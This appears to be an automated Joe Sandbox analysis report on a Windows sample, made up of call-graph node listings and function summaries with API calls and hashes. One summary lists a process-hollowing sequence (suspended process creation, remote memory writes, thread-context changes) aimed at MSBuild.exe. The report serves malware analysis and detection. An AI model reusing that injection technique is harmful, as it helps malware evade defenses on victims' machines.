20883 ec1eb0 std::_Throw_Cpp_error 5 API calls 20882->20883 20884 ec3980 20883->20884 20884->20868 20886 ef5ea8 std::_Throw_Cpp_error 20885->20886 20887 ec8eaa __ehhandler$___std_fs_change_permissions@12 5 API calls 20886->20887 20888 ec847c 20887->20888 20889 ec1960 20888->20889 20892 ec19e0 20889->20892 20893 ec1a10 std::_Throw_Cpp_error 29 API calls 20892->20893 20894 ec1987 20893->20894 20894->20878 20896 ec75b2 20895->20896 20899 ecf368 20896->20899 20898 ec6636 20898->20774 20900 ecf37c _Fputc 20899->20900 20903 ecf6ab 20900->20903 20902 ecf397 _Fputc 20902->20898 20904 ecf6da 20903->20904 20905 ecf6b7 20903->20905 20909 ecf701 20904->20909 20911 ecf849 20904->20911 20906 ed3d59 
_Fputc 29 API calls 20905->20906 20910 ecf6d2 20906->20910 20908 ed3d59 _Fputc 29 API calls 20908->20910 20909->20908 20909->20910 20910->20902 20912 ecf898 20911->20912 20913 ecf875 20911->20913 20912->20913 20917 ecf8a0 20912->20917 20914 ed3d59 _Fputc 29 API calls 20913->20914 20915 ecf88d 20914->20915 20916 ec8eaa __ehhandler$___std_fs_change_permissions@12 5 API calls 20915->20916 20918 ecf9bb 20916->20918 20922 ecfaa5 20917->20922 20918->20909 20939 ecf74a 20922->20939 20924 ecf921 20936 ecf581 20924->20936 20925 ed3d59 _Fputc 29 API calls 20925->20924 20926 ecfaca 20926->20925 20931 ecfabf std::_Locinfo::_Locinfo_dtor 20931->20924 20931->20926 20932 ecfbce 20931->20932 20943 ecf4b0 20931->20943 20949 ecfd89 20931->20949 20952 ecfe01 20931->20952 20986 ecff5a 20931->20986 20933 ed3d59 _Fputc 29 API calls 20932->20933 20934 ecfbe8 20933->20934 20935 ed3d59 _Fputc 29 API calls 20934->20935 20935->20924 20937 ed7347 ___free_lconv_mon 14 API calls 20936->20937 20938 ecf591 20937->20938 20938->20915 20940 ecf76e 20939->20940 20941 ecf755 20939->20941 20940->20931 20942 ed3d59 _Fputc 29 API calls 20941->20942 20942->20940 20944 ecf4c0 20943->20944 21015 ed7c10 20944->21015 21023 ed071b 20949->21023 20951 ecfdc4 20951->20931 20953 ecfe1f 20952->20953 20954 ecfe08 20952->20954 20957 ed3d59 _Fputc 29 API calls 20953->20957 20963 ecfe5e 20953->20963 20955 ecffdf 20954->20955 20956 ecff7f 20954->20956 20954->20963 20958 ed0018 20955->20958 20959 ecffe4 20955->20959 20960 ed0005 20956->20960 20961 ecff85 20956->20961 20962 ecfe53 20957->20962 20964 ed001d 20958->20964 20965 ed0035 20958->20965 20966 ecffe6 20959->20966 20967 ed0011 20959->20967 21071 ed0c44 20960->21071 20973 ecffd6 20961->20973 20974 ecff8a 20961->20974 20962->20931 20963->20931 20964->20960 20964->20973 20985 ecffb0 20964->20985 21082 ed05d1 20965->21082 20968 ecff99 20966->20968 20976 ecfff5 20966->20976 21078 ed05b4 20967->21078 20984 ed003e 20968->20984 21046 ed0423 20968->21046 20973->20984 21060 
ed092a 20973->21060 20974->20968 20977 ecffc3 20974->20977 20974->20985 20976->20960 20978 ecfff9 20976->20978 20977->20984 21056 ed02b9 20977->21056 20978->20984 21067 ed05e7 20978->21067 20980 ec8eaa __ehhandler$___std_fs_change_permissions@12 5 API calls 20982 ed02b7 20980->20982 20982->20931 20984->20980 20985->20984 21085 eda81b 20985->21085 20987 ecffdf 20986->20987 20988 ecff7f 20986->20988 20989 ed0018 20987->20989 20990 ecffe4 20987->20990 20991 ed0005 20988->20991 20992 ecff85 20988->20992 20993 ed001d 20989->20993 20994 ed0035 20989->20994 20995 ecffe6 20990->20995 20996 ed0011 20990->20996 21000 ed0c44 30 API calls 20991->21000 21002 ecffd6 20992->21002 21003 ecff8a 20992->21003 20993->20991 20993->21002 21014 ecffb0 20993->21014 20999 ed05d1 30 API calls 20994->20999 20998 ecff99 20995->20998 21005 ecfff5 20995->21005 20997 ed05b4 30 API calls 20996->20997 20997->21014 21001 ed0423 42 API calls 20998->21001 21012 ed003e 20998->21012 20999->21014 21000->21014 21001->21014 21004 ed092a 30 API calls 21002->21004 21002->21012 21003->20998 21006 ecffc3 21003->21006 21003->21014 21004->21014 21005->20991 21007 ecfff9 21005->21007 21008 ed02b9 41 API calls 21006->21008 21006->21012 21010 ed05e7 29 API calls 21007->21010 21007->21012 21008->21014 21009 ec8eaa __ehhandler$___std_fs_change_permissions@12 5 API calls 21011 ed02b7 21009->21011 21010->21014 21011->20931 21012->21009 21013 eda81b 41 API calls 21013->21014 21014->21012 21014->21013 21016 ecf4dd 21015->21016 21017 ed7c27 21015->21017 21019 ed7c41 21016->21019 21017->21016 21018 edbc44 __Getctype 39 API calls 21017->21018 21018->21016 21020 ecf4ea 21019->21020 21021 ed7c58 21019->21021 21020->20931 21021->21020 21022 ed8f32 __strnicoll 39 API calls 21021->21022 21022->21020 21033 ed06a9 21023->21033 21025 ed072d 21026 ed0742 21025->21026 21029 ed0775 21025->21029 21032 ed075d std::_Locinfo::_Locinfo_dtor 21025->21032 21027 ed3d59 _Fputc 29 API calls 21026->21027 21027->21032 21028 ed080c 21030 ed06f2 
29 API calls 21028->21030 21029->21028 21040 ed06f2 21029->21040 21030->21032 21032->20951 21034 ed06ae 21033->21034 21035 ed06c1 21033->21035 21036 ed34c5 __strnicoll 14 API calls 21034->21036 21035->21025 21037 ed06b3 21036->21037 21038 ed3bb0 __strnicoll 29 API calls 21037->21038 21039 ed06be 21038->21039 21039->21025 21041 ed0717 21040->21041 21042 ed0703 21040->21042 21041->21028 21042->21041 21043 ed34c5 __strnicoll 14 API calls 21042->21043 21044 ed070c 21043->21044 21045 ed3bb0 __strnicoll 29 API calls 21044->21045 21045->21041 21047 ed043d 21046->21047 21095 ecf9bd 21047->21095 21049 ed047c 21106 ed9d24 21049->21106 21052 ecf4b0 std::_Locinfo::_Locinfo_dtor 39 API calls 21053 ed0533 21052->21053 21054 ecf4b0 std::_Locinfo::_Locinfo_dtor 39 API calls 21053->21054 21055 ed0566 21053->21055 21054->21055 21055->20985 21055->21055 21057 ed02d4 21056->21057 21058 ed030a 21057->21058 21059 eda81b 41 API calls 21057->21059 21058->20985 21059->21058 21061 ed093f 21060->21061 21062 ed0961 21061->21062 21064 ed0988 21061->21064 21063 ed3d59 _Fputc 29 API calls 21062->21063 21066 ed097e 21063->21066 21065 ecf9bd 15 API calls 21064->21065 21064->21066 21065->21066 21066->20985 21070 ed05fd 21067->21070 21068 ed3d59 _Fputc 29 API calls 21069 ed061e 21068->21069 21069->20985 21070->21068 21070->21069 21072 ed0c59 21071->21072 21073 ed0c7b 21072->21073 21075 ed0ca2 21072->21075 21074 ed3d59 _Fputc 29 API calls 21073->21074 21077 ed0c98 21074->21077 21076 ecf9bd 15 API calls 21075->21076 21075->21077 21076->21077 21077->20985 21079 ed05c0 21078->21079 21170 ed0ab7 21079->21170 21081 ed05d0 21081->20985 21083 ed092a 30 API calls 21082->21083 21084 ed05e6 21083->21084 21084->20985 21086 eda830 21085->21086 21087 eda871 21086->21087 21088 ecf4b0 std::_Locinfo::_Locinfo_dtor 39 API calls 21086->21088 21090 eda85d std::invalid_argument::invalid_argument 21086->21090 21094 eda834 std::_Locinfo::_Locinfo_dtor std::invalid_argument::invalid_argument 21086->21094 21087->21090 21091 
ed7491 std::_Locinfo::_Locinfo_dtor WideCharToMultiByte 21087->21091 21087->21094 21088->21087 21089 ed3d59 _Fputc 29 API calls 21089->21094 21090->21089 21090->21094 21092 eda92c 21091->21092 21093 eda942 GetLastError 21092->21093 21092->21094 21093->21090 21093->21094 21094->20985 21096 ecf9e4 21095->21096 21097 ecf9d2 21095->21097 21096->21097 21098 ed7381 __fread_nolock 15 API calls 21096->21098 21097->21049 21099 ecfa08 21098->21099 21100 ecfa1b 21099->21100 21101 ecfa10 21099->21101 21125 ecf55d 21100->21125 21102 ed7347 ___free_lconv_mon 14 API calls 21101->21102 21102->21097 21105 ed7347 ___free_lconv_mon 14 API calls 21105->21097 21107 ed9d35 21106->21107 21108 ed9d59 21106->21108 21109 ed3d59 _Fputc 29 API calls 21107->21109 21108->21107 21110 ed9d8c 21108->21110 21122 ed050f 21109->21122 21111 ed9dc5 21110->21111 21113 ed9df4 21110->21113 21128 ed9ed9 21111->21128 21112 ed9e1d 21116 ed9e4a 21112->21116 21117 ed9e84 21112->21117 21113->21112 21114 ed9e22 21113->21114 21136 eda29b 21114->21136 21119 ed9e4f 21116->21119 21120 ed9e6a 21116->21120 21163 eda0c1 21117->21163 21146 eda74c 21119->21146 21156 eda6b6 21120->21156 21122->21052 21122->21053 21126 ed7347 ___free_lconv_mon 14 API calls 21125->21126 21127 ecf56c 21126->21127 21127->21105 21129 ed9eef 21128->21129 21130 ed9efa 21128->21130 21129->21122 21131 ed6fbc ___std_exception_copy 29 API calls 21130->21131 21132 ed9f55 21131->21132 21133 ed9f5f 21132->21133 21134 ed3bdd __Getctype 11 API calls 21132->21134 21133->21122 21135 ed9f6d 21134->21135 21137 eda2ae 21136->21137 21138 eda2bd 21137->21138 21139 eda2df 21137->21139 21140 ed3d59 _Fputc 29 API calls 21138->21140 21141 eda2f4 21139->21141 21143 eda347 21139->21143 21145 eda2d5 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z std::invalid_argument::invalid_argument _strrchr __allrem 21140->21145 21142 eda0c1 41 API calls 21141->21142 21142->21145 21144 ecf4b0 std::_Locinfo::_Locinfo_dtor 39 API calls 21143->21144 21143->21145 21144->21145 21145->21122 
21147 ee29f2 31 API calls 21146->21147 21148 eda77c 21147->21148 21149 ee2847 29 API calls 21148->21149 21150 eda7ba 21149->21150 21151 eda7c1 21150->21151 21152 eda7fa 21150->21152 21153 eda7d3 21150->21153 21151->21122 21154 ed9f6e 41 API calls 21152->21154 21155 eda5c8 39 API calls 21153->21155 21154->21151 21155->21151 21157 ee29f2 31 API calls 21156->21157 21158 eda6e5 21157->21158 21159 ee2847 29 API calls 21158->21159 21160 eda726 21159->21160 21161 eda72d 21160->21161 21162 eda5c8 39 API calls 21160->21162 21161->21122 21162->21161 21164 ee29f2 31 API calls 21163->21164 21165 eda0eb 21164->21165 21166 ee2847 29 API calls 21165->21166 21167 eda139 21166->21167 21168 eda140 21167->21168 21169 ed9f6e 41 API calls 21167->21169 21168->21122 21169->21168 21171 ed0acc 21170->21171 21172 ed0aee 21171->21172 21174 ed0b15 21171->21174 21173 ed3d59 _Fputc 29 API calls 21172->21173 21176 ed0b0b 21173->21176 21175 ecf9bd 15 API calls 21174->21175 21174->21176 21175->21176 21176->21081 21178 ed75d3 __Getctype 39 API calls 21177->21178 21179 ed51ef 21178->21179 21180 ed7bb6 __Getctype 39 API calls 21179->21180 21181 ed51ff 21180->21181 21181->20779 21183 ec91bd std::_Lockit::_Lockit 7 API calls 21182->21183 21184 ec3ee4 21183->21184 21241 ec4080 21184->21241 21186 ec3efa 21200 ec3f25 21186->21200 21249 ec41b0 21186->21249 21187 ec91ee std::_Lockit::~_Lockit 2 API calls 21189 ec3fb0 21187->21189 21191 ec8eaa __ehhandler$___std_fs_change_permissions@12 5 API calls 21189->21191 21193 ec3fba 21191->21193 21192 ec3f50 21195 ec4280 5 API calls 21192->21195 21193->20781 21196 ec3f64 21195->21196 21265 ec9261 21196->21265 21200->21187 21202 ec668c std::_Throw_Cpp_error 21201->21202 21501 ec6aa0 21202->21501 21242 ec40de 21241->21242 21243 ec40a2 21241->21243 21245 ec8eaa __ehhandler$___std_fs_change_permissions@12 5 API calls 21242->21245 21244 ec91bd std::_Lockit::_Lockit 7 API calls 21243->21244 21246 ec40b3 21244->21246 21247 ec40f0 21245->21247 21248 ec91ee 
std::_Lockit::~_Lockit 2 API calls 21246->21248 21247->21186 21248->21242 21250 ec422c 21249->21250 21251 ec41d0 21249->21251 21252 ec8eaa __ehhandler$___std_fs_change_permissions@12 5 API calls 21250->21252 21251->21250 21253 ec8e36 std::ios_base::_Init 3 API calls 21251->21253 21254 ec3f42 21252->21254 21255 ec41e8 codecvt 21253->21255 21254->21192 21261 ec4250 21254->21261 21270 ec43b0 21255->21270 21262 ec4268 21261->21262 21263 ecc47a CallUnexpected RaiseException 21262->21263 21264 ec427d 21263->21264 21266 ec926c ___std_exception_copy 21265->21266 21267 ec3f72 21266->21267 21497 ec9788 21266->21497 21271 ec91bd std::_Lockit::_Lockit 7 API calls 21270->21271 21272 ec43d0 codecvt 21271->21272 21273 ec441f 21272->21273 21274 ec443b 21272->21274 21300 ec92e3 21273->21300 21309 ec97e5 21274->21309 21316 ed5217 21300->21316 21447 ec98d2 21309->21447 21502 ec1db0 std::_Throw_Cpp_error 5 API calls 21501->21502 22013 eca651 22014 eca665 22013->22014 22020 eca6c0 22014->22020 22021 eca8c5 22014->22021 22017 eca6ad 22017->22020 22031 ed4776 22017->22031 22024 eca8df 22021->22024 22025 eca92e 22021->22025 22022 ec8eaa __ehhandler$___std_fs_change_permissions@12 5 API calls 22023 eca690 22022->22023 22023->22017 22023->22020 22027 ed3575 22023->22027 22024->22025 22026 ed4dca 69 API calls 22024->22026 22025->22022 22026->22025 22028 ed3588 _Fputc 22027->22028 22045 ed37ee 22028->22045 22030 ed359d _Fputc 22030->22017 22032 ed4796 22031->22032 22033 ed4781 22031->22033 22035 ed479e 22032->22035 22036 ed47b3 22032->22036 22034 ed34c5 __strnicoll 14 API calls 22033->22034 22037 ed4786 22034->22037 22038 ed34c5 __strnicoll 14 API calls 22035->22038 22131 eddef3 22036->22131 22040 ed3bb0 __strnicoll 29 API calls 22037->22040 22041 ed47a3 22038->22041 22043 ed4791 22040->22043 22044 ed3bb0 __strnicoll 29 API calls 22041->22044 22042 ed47ae 22042->22020 22043->22020 22044->22042 22047 ed37fa ___scrt_is_nonwritable_in_current_image 22045->22047 22046 ed3800 22048 ed3d59 _Fputc 
29 API calls 22046->22048 22047->22046 22049 ed3843 22047->22049 22055 ed381b 22048->22055 22056 ecf144 EnterCriticalSection 22049->22056 22051 ed384f 22057 ed3702 22051->22057 22053 ed3865 22068 ed388e 22053->22068 22055->22030 22056->22051 22058 ed3728 22057->22058 22059 ed3715 22057->22059 22071 ed3629 22058->22071 22059->22053 22061 ed374b 22064 ed3766 22061->22064 22067 ed37d9 22061->22067 22075 eddf29 22061->22075 22063 ed437f ___scrt_uninitialize_crt 64 API calls 22065 ed3779 22063->22065 22064->22063 22089 eddd0f 22065->22089 22067->22053 22130 ecf158 LeaveCriticalSection 22068->22130 22070 ed3896 22070->22055 22072 ed363a 22071->22072 22074 ed3692 22071->22074 22073 eddccf __fread_nolock 31 API calls 22072->22073 22072->22074 22073->22074 22074->22061 22076 ede2fb 22075->22076 22077 ede30a 22076->22077 22078 ede332 22076->22078 22079 ed3d59 _Fputc 29 API calls 22077->22079 22080 edaab8 __fread_nolock 29 API calls 22078->22080 22081 ede325 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 22079->22081 22082 ede33b 22080->22082 22081->22064 22092 eddd2d 22082->22092 22085 ede3fc 22085->22081 22107 ede130 22085->22107 22086 ede3e5 22095 eddf85 22086->22095 22090 edde70 __fread_nolock 31 API calls 22089->22090 22091 eddd28 22090->22091 22091->22067 22114 eddd4b 22092->22114 22096 eddf94 _Fputc 22095->22096 22097 edaab8 __fread_nolock 29 API calls 22096->22097 22098 eddfb0 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 22097->22098 22100 eddd2d 33 API calls 22098->22100 22106 eddfbc 22098->22106 22099 ec8eaa __ehhandler$___std_fs_change_permissions@12 5 API calls 22101 ede12e 22099->22101 22102 ede010 22100->22102 22101->22081 22103 ede042 ReadFile 22102->22103 22102->22106 22104 ede069 22103->22104 22103->22106 22105 eddd2d 33 API calls 22104->22105 22105->22106 22106->22099 22108 edaab8 __fread_nolock 29 API calls 22107->22108 22109 ede143 22108->22109 22110 eddd2d 33 API calls 22109->22110 22113 ede18d __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 22109->22113 22111 
ede1ea 22110->22111 22112 eddd2d 33 API calls 22111->22112 22111->22113 22112->22113 22113->22081 22116 eddd57 ___scrt_is_nonwritable_in_current_image 22114->22116 22115 eddd46 22115->22081 22115->22085 22115->22086 22116->22115 22117 eddd9a 22116->22117 22119 eddde0 22116->22119 22118 ed3d59 _Fputc 29 API calls 22117->22118 22118->22115 22125 edebd5 EnterCriticalSection 22119->22125 22121 eddde6 22122 edde07 22121->22122 22123 edde70 __fread_nolock 31 API calls 22121->22123 22126 edde68 22122->22126 22123->22122 22125->22121 22129 edebf8 LeaveCriticalSection 22126->22129 22128 edde6e 22128->22115 22129->22128 22130->22070 22132 eddf07 _Fputc 22131->22132 22135 ede49c 22132->22135 22134 eddf13 _Fputc 22134->22042 22136 ede4a8 ___scrt_is_nonwritable_in_current_image 22135->22136 22137 ede4af 22136->22137 22138 ede4d2 22136->22138 22139 ed3d59 _Fputc 29 API calls 22137->22139 22146 ecf144 EnterCriticalSection 22138->22146 22141 ede4c8 22139->22141 22141->22134 22142 ede4e0 22147 ede2fb 22142->22147 22144 ede4ef 22160 ede521 22144->22160 22146->22142 22148 ede30a 22147->22148 22149 ede332 22147->22149 22150 ed3d59 _Fputc 29 API calls 22148->22150 22151 edaab8 __fread_nolock 29 API calls 22149->22151 22152 ede325 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 22150->22152 22153 ede33b 22151->22153 22152->22144 22154 eddd2d 33 API calls 22153->22154 22155 ede359 22154->22155 22155->22152 22156 ede3fc 22155->22156 22157 ede3e5 22155->22157 22156->22152 22159 ede130 33 API calls 22156->22159 22158 eddf85 34 API calls 22157->22158 22158->22152 22159->22152 22163 ecf158 LeaveCriticalSection 22160->22163 22162 ede529 22162->22141 22163->22162 22242 ecf234 22243 ed4311 ___scrt_uninitialize_crt 68 API calls 22242->22243 22244 ecf23c 22243->22244 22252 ed9bd7 22244->22252 22246 ecf241 22262 ed9c82 22246->22262 22249 ecf26b 22250 ed7347 ___free_lconv_mon 14 API calls 22249->22250 22251 ecf276 22250->22251 22253 ed9be3 ___scrt_is_nonwritable_in_current_image 22252->22253 22266 
ed3ea8 EnterCriticalSection 22253->22266 22255 ed9c5a 22271 ed9c79 22255->22271 22257 ed9bee 22257->22255 22259 ed9c2e DeleteCriticalSection 22257->22259 22267 ed4169 22257->22267 22261 ed7347 ___free_lconv_mon 14 API calls 22259->22261 22261->22257 22263 ecf250 DeleteCriticalSection 22262->22263 22264 ed9c99 22262->22264 22263->22246 22263->22249 22264->22263 22265 ed7347 ___free_lconv_mon 14 API calls 22264->22265 22265->22263 22266->22257 22268 ed417c _Fputc 22267->22268 22274 ed4227 22268->22274 22270 ed4188 _Fputc 22270->22257 22346 ed3ebf LeaveCriticalSection 22271->22346 22273 ed9c66 22273->22246 22275 ed4233 ___scrt_is_nonwritable_in_current_image 22274->22275 22276 ed423d 22275->22276 22277 ed4260 22275->22277 22278 ed3d59 _Fputc 29 API calls 22276->22278 22284 ed4258 22277->22284 22285 ecf144 EnterCriticalSection 22277->22285 22278->22284 22280 ed427e 22286 ed4199 22280->22286 22282 ed428b 22300 ed42b6 22282->22300 22284->22270 22285->22280 22287 ed41c9 22286->22287 22288 ed41a6 22286->22288 22290 ed41c1 22287->22290 22291 ed437f ___scrt_uninitialize_crt 64 API calls 22287->22291 22289 ed3d59 _Fputc 29 API calls 22288->22289 22289->22290 22290->22282 22292 ed41e1 22291->22292 22293 ed9c82 14 API calls 22292->22293 22294 ed41e9 22293->22294 22295 edaab8 __fread_nolock 29 API calls 22294->22295 22296 ed41f5 22295->22296 22303 edecd1 22296->22303 22299 ed7347 ___free_lconv_mon 14 API calls 22299->22290 22345 ecf158 LeaveCriticalSection 22300->22345 22302 ed42bc 22302->22284 22305 edecfa 22303->22305 22309 ed41fc 22303->22309 22304 eded49 22306 ed3d59 _Fputc 29 API calls 22304->22306 22305->22304 22307 eded21 22305->22307 22306->22309 22310 eded74 22307->22310 22309->22290 22309->22299 22311 eded80 ___scrt_is_nonwritable_in_current_image 22310->22311 22318 edebd5 EnterCriticalSection 22311->22318 22313 eded8e 22314 ededbf 22313->22314 22319 edec31 22313->22319 22332 ededf9 22314->22332 22318->22313 22320 ede98c __fread_nolock 29 API calls 22319->22320 22322 
edec41 22320->22322 22321 edec47 22335 ede9f6 22321->22335 22322->22321 22323 edec79 22322->22323 22325 ede98c __fread_nolock 29 API calls 22322->22325 22323->22321 22326 ede98c __fread_nolock 29 API calls 22323->22326 22327 edec70 22325->22327 22328 edec85 CloseHandle 22326->22328 22329 ede98c __fread_nolock 29 API calls 22327->22329 22328->22321 22330 edec91 GetLastError 22328->22330 22329->22323 22330->22321 22331 edec9f __fread_nolock 22331->22314 22344 edebf8 LeaveCriticalSection 22332->22344 22334 edede2 22334->22309 22336 edea6c 22335->22336 22338 edea05 22335->22338 22337 ed34c5 __strnicoll 14 API calls 22336->22337 22339 edea71 22337->22339 22338->22336 22343 edea2f 22338->22343 22340 ed34d8 __dosmaperr 14 API calls 22339->22340 22341 edea5c 22340->22341 22341->22331 22342 edea56 SetStdHandle 22342->22341 22343->22341 22343->22342 22344->22334 22345->22302 22346->22273

Control-flow Graph

APIs
• CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00EF211B,00EF210B), ref: 00EF233F
• VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00EF2352
• Wow64GetThreadContext.KERNEL32(00000088,00000000), ref: 00EF2370
• ReadProcessMemory.KERNELBASE(00000140,?,00EF215F,00000004,00000000), ref: 00EF2394
• VirtualAllocEx.KERNELBASE(00000140,?,?,00003000,00000040), ref: 00EF23BF
• WriteProcessMemory.KERNELBASE(00000140,00000000,?,?,00000000,?), ref: 00EF2417
• WriteProcessMemory.KERNELBASE(00000140,00400000,?,?,00000000,?,00000028), ref: 00EF2462
• WriteProcessMemory.KERNELBASE(00000140,?,?,00000004,00000000), ref: 00EF24A0
• Wow64SetThreadContext.KERNEL32(00000088,00A10000), ref: 00EF24DC
• ResumeThread.KERNELBASE(00000088), ref: 00EF24EB
Strings
Memory Dump Source
• Source File: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
Similarity
• API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
• String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
• API String ID: 2687962208-3857624555
• Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
• Instruction ID: 23a453417767e844b6db927f33d68acc3b944dca74e6d6d9e697c4b66d58f27a
• Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
• Instruction Fuzzy Hash: 56B1097260164AAFDB60CF68CC80BEA73A5FF88714F158158EA0CAB341D774FA51CB94

Control-flow Graph

[Control-flow graph for the function whose entry block is ed8362-ed836e; rendered graph omitted. API calls visible in the graph: LoadLibraryExW, GetLastError, FreeLibrary]
APIs
• FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,A38A0892,?,00ED8471,?,?,00000000), ref: 00ED8423
Strings
Memory Dump Source
• Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
Similarity
• API ID: FreeLibrary
• String ID: api-ms-$ext-ms-
• API String ID: 3664257935-537541572
• Opcode ID: cc476ab74e44742f1fbc118ba93f06a3b19defdfd177c2fb5f80338bb1a3ce82
• Instruction ID: 22a6a29d2f4f5e68c797249eee7ce249c2c8e91f694e7795e071de4cd3f39d0a
• Opcode Fuzzy Hash: cc476ab74e44742f1fbc118ba93f06a3b19defdfd177c2fb5f80338bb1a3ce82
• Instruction Fuzzy Hash: E7212732A01215ABC7219B66EE80B6F3758EB81764F251222E915B73D2EF30ED02C6D0

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
Similarity
• API ID: File$CloseCreateHandleSize
• String ID:
• API String ID: 1378416451-0
• Opcode ID: 5ec95fbf90a7b7719f4568e9df8b932412f017c3129f4be9fac1124df01db11a
• Instruction ID: 6c6634b2de87a2b2c47519ddccf7bef417b9efa17941094ba8522192d3e2b6d3
• Opcode Fuzzy Hash: 5ec95fbf90a7b7719f4568e9df8b932412f017c3129f4be9fac1124df01db11a
• Instruction Fuzzy Hash: 6871D0B1D04648CFCB04EFA8D588BADBBF0BF98314F108529E599AB341D774A949CF52

Control-flow Graph

[Control-flow graph for the function whose entry block is edef5f-edef81; rendered graph omitted. API calls visible in the graph: WriteFile, GetLastError]
APIs
  • Part of subcall function 00EDF309: GetConsoleOutputCP.KERNEL32(A38A0892,00000000,00000000,?), ref: 00EDF36C
• WriteFile.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,00ED434B,?), ref: 00EDF0E4
• GetLastError.KERNEL32(?,?,00ED434B,?,00ED458F,00000000,?,00000000,00ED458F,?,?,?,00EF16F0,0000002C,00ED447B,?), ref: 00EDF0EE
Strings
Memory Dump Source
• Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ConsoleErrorFileLastOutputWrite
                                                                                                                                                                                                                                                                  • String ID: KC
                                                                                                                                                                                                                                                                  • API String ID: 2915228174-345211725
                                                                                                                                                                                                                                                                  • Opcode ID: a1283e75346e91b1ee46a35794e98ba94ebb9165fbaba894d56da2e3fa2e78fb
                                                                                                                                                                                                                                                                  • Instruction ID: d35b8d3d0809f0b63b418d80e249e94dd4fda6f1dff7efd18ba0dfbd4f11f1c1
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a1283e75346e91b1ee46a35794e98ba94ebb9165fbaba894d56da2e3fa2e78fb
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 82618F71D04159AFDF11DFA8C884AEEBBB9EF49308F145166E805BB352D732DA06CB90

                                                                                                                                                                                                                                                                  Control-flow Graph

